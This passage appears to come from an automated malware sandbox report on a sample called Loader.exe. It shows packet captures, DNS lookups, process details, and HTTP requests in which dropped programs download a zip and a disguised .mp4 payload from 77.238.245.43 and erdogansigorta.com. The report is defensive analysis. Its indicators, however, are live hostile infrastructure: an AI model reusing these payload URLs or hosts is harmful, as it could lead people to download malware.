                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.000104904 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.002083063 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.121939898 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.352480888 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.356939077 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.476620913 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.477112055 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.596792936 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.827111006 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.828844070 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.828881025 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.828893900 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.829025984 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.829036951 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.837380886 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.837505102 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.838025093 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.844957113 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.845031023 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.845031023 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.853367090 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.853476048 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:09.854104042 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.969758987 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.973922968 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.974986076 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.975104094 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.980194092 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.980221987 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.980222940 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.985172987 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.985203028 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.985263109 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.987668037 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.990114927 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.990266085 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.995153904 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.995182037 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:12.995275021 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.000197887 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.000226021 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.000323057 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.005225897 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.005269051 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.005319118 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.009924889 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.010201931 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.010340929 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.014314890 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.015204906 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.015307903 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.015369892 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.020191908 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.020298958 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.025180101 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.025208950 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.025296926 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.027091980 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.030164957 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.030219078 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.034007072 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.035248995 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.035425901 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.037921906 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.040251970 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.040352106 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.045258999 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.045304060 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.045355082 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.046267033 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.050247908 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.050271988 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.057929993 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.109587908 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.109617949 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.111373901 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.111407995 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.111474991 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.114950895 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.114981890 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.116281986 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.116389036 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.117924929 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.119895935 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.119963884 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.120076895 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.123470068 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.123600006 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.126046896 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.127026081 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.127141953 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.129926920 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.130464077 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.130577087 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.134017944 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.134037018 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.134049892 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.137259007 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.234177113 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.234962940 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.235057116 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.235085964 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.237667084 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.237803936 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.237924099 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.240329027 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.240444899 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.240469933 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.243051052 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.243159056 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.243170023 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.245713949 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.246049881 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.470973969 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.590673923 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.590823889 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.710485935 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.941091061 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.941157103 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.941203117 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.941246033 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.941297054 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.941358089 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:13.941422939 CET499597982192.168.2.5104.37.175.218
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:14.061009884 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:55:14.061031103 CET798249959104.37.175.218192.168.2.5
                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:35.631444931 CET5306153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:53:36.127140999 CET53530611.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.892153978 CET6443853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.892488003 CET5408353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.894917011 CET6209053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.896636963 CET5113653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.897696972 CET5785253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:40.898921013 CET6352953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.034166098 CET53511361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.124727011 CET53635291.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.288974047 CET53578521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.539417982 CET53620901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.666671038 CET53644381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.924690008 CET53540831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.927987099 CET5408353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945072889 CET63530123192.168.2.5213.239.239.164
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945135117 CET63530123192.168.2.594.198.159.10
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945225954 CET63530123192.168.2.5129.250.35.250
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945288897 CET63530123192.168.2.5194.58.203.20
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945352077 CET63530123192.168.2.5169.229.128.134
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:41.945353985 CET63530123192.168.2.562.149.0.30
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:42.064918041 CET53540831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.031667948 CET12363530129.250.35.250192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.099066019 CET12363530169.229.128.134192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.106702089 CET1236353094.198.159.10192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.123066902 CET12363530194.58.203.20192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.123128891 CET12363530213.239.239.164192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:43.135974884 CET1236353062.149.0.30192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:50.392026901 CET53515641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:50.654002905 CET53646191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431107044 CET5075053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431237936 CET5887953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431571960 CET6071853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.431735992 CET4969553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568259954 CET53507501.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568341970 CET53588791.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568604946 CET53607181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                              Dec 22, 2024 23:54:59.568986893 CET53496951.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 22, 2024 23:54:42.069057941 CET | 192.168.2.5 | 1.1.1.1 | c1fc | (Port unreachable) | Destination Unreachable
Dec 22, 2024 23:54:50.746054888 CET | 192.168.2.5 | 1.1.1.1 | c234 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 22, 2024 23:53:35.631444931 CET | 192.168.2.5 | 1.1.1.1 | 0xa90e | Standard query (0) | erdogansigorta.com | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:40.892153978 CET | 192.168.2.5 | 1.1.1.1 | 0x1dd5 | Standard query (0) | ntp.time.in.ua | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:40.892488003 CET | 192.168.2.5 | 1.1.1.1 | 0x50f0 | Standard query (0) | ntp1.net.berkeley.edu | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:40.894917011 CET | 192.168.2.5 | 1.1.1.1 | 0x6ea0 | Standard query (0) | gbg1.ntp.se | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:40.896636963 CET | 192.168.2.5 | 1.1.1.1 | 0x19b0 | Standard query (0) | x.ns.gin.ntt.net | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:40.897696972 CET | 192.168.2.5 | 1.1.1.1 | 0xd8ab | Standard query (0) | ntp.time.nl | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:40.898921013 CET | 192.168.2.5 | 1.1.1.1 | 0xfcbf | Standard query (0) | ntp1.hetzner.de | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:41.927987099 CET | 192.168.2.5 | 1.1.1.1 | 0x50f0 | Standard query (0) | ntp1.net.berkeley.edu | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:59.431107044 CET | 192.168.2.5 | 1.1.1.1 | 0xc265 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:59.431237936 CET | 192.168.2.5 | 1.1.1.1 | 0xd059 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Dec 22, 2024 23:54:59.431571960 CET | 192.168.2.5 | 1.1.1.1 | 0x8a22 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:59.431735992 CET | 192.168.2.5 | 1.1.1.1 | 0x977a | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 22, 2024 23:53:36.127140999 CET | 1.1.1.1 | 192.168.2.5 | 0xa90e | No error (0) | erdogansigorta.com | | 5.2.81.126 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:41.034166098 CET | 1.1.1.1 | 192.168.2.5 | 0x19b0 | No error (0) | x.ns.gin.ntt.net | | 129.250.35.250 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:41.124727011 CET | 1.1.1.1 | 192.168.2.5 | 0xfcbf | No error (0) | ntp1.hetzner.de | | 213.239.239.164 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:41.288974047 CET | 1.1.1.1 | 192.168.2.5 | 0xd8ab | No error (0) | ntp.time.nl | | 94.198.159.10 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:41.288974047 CET | 1.1.1.1 | 192.168.2.5 | 0xd8ab | No error (0) | ntp.time.nl | | 94.198.159.14 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:41.539417982 CET | 1.1.1.1 | 192.168.2.5 | 0x6ea0 | No error (0) | gbg1.ntp.se | gbg1.ntp.netnod.se | | CNAME (Canonical name) | IN (0x0001) | false
Dec 22, 2024 23:54:41.539417982 CET | 1.1.1.1 | 192.168.2.5 | 0x6ea0 | No error (0) | gbg1.ntp.netnod.se | | 194.58.203.20 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:41.666671038 CET | 1.1.1.1 | 192.168.2.5 | 0x1dd5 | No error (0) | ntp.time.in.ua | | 62.149.0.30 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:41.924690008 CET | 1.1.1.1 | 192.168.2.5 | 0x50f0 | No error (0) | ntp1.net.berkeley.edu | | 169.229.128.134 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:42.064918041 CET | 1.1.1.1 | 192.168.2.5 | 0x50f0 | No error (0) | ntp1.net.berkeley.edu | | 169.229.128.134 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:59.568259954 CET | 1.1.1.1 | 192.168.2.5 | 0xc265 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:59.568259954 CET | 1.1.1.1 | 192.168.2.5 | 0xc265 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:59.568341970 CET | 1.1.1.1 | 192.168.2.5 | 0xd059 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 22, 2024 23:54:59.568604946 CET | 1.1.1.1 | 192.168.2.5 | 0x8a22 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:59.568604946 CET | 1.1.1.1 | 192.168.2.5 | 0x8a22 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 23:54:59.568986893 CET | 1.1.1.1 | 192.168.2.5 | 0x977a | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
• erdogansigorta.com
• 77.238.245.43

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49730 | 77.238.245.43 | 80 | 5908 | C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe

Timestamp | Bytes transferred | Direction | Data
Dec 22, 2024 23:53:32.275815010 CET | 181 | OUT | GET /tamus/medicalanalysispro.zip HTTP/1.1
User-Agent: Java/1.8.0_101
Host: 77.238.245.43
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Dec 22, 2024 23:53:33.504648924 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 22:53:33 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Sun, 15 Dec 2024 14:19:18 GMT
ETag: "25a7f-6294fbfd8df7a"
Accept-Ranges: bytes
Content-Length: 154239
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/zip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49736 | 5.2.81.126 | 443 | 5648 | C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-22 22:53:38 UTC | 84 | OUT | GET /temp/Nomrwfj.mp4 HTTP/1.1
Host: erdogansigorta.com
Connection: Keep-Alive
2024-12-22 22:53:38 UTC | 300 | IN | HTTP/1.1 200 OK
Content-Type: video/mp4
Last-Modified: Sun, 15 Dec 2024 12:38:32 GMT
Accept-Ranges: bytes
ETag: "2e747540ee4edb1:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Date: Sun, 22 Dec 2024 22:53:38 GMT
Connection: close
Content-Length: 1174536



                                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                                              Start time:17:53:08
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                              File size:96'490'794 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:031BAFFF0A790EFC6955A90DAFC6D0E1
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                                              Start time:17:53:18
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe
                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                              File size:113'664 bytes
                                                                                                                                                                                                                                                                                                              MD5 hash:ABE04EC3EDDF9D00B7E948E5404E172C
                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                                              Start time:17:53:18
                                                                                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
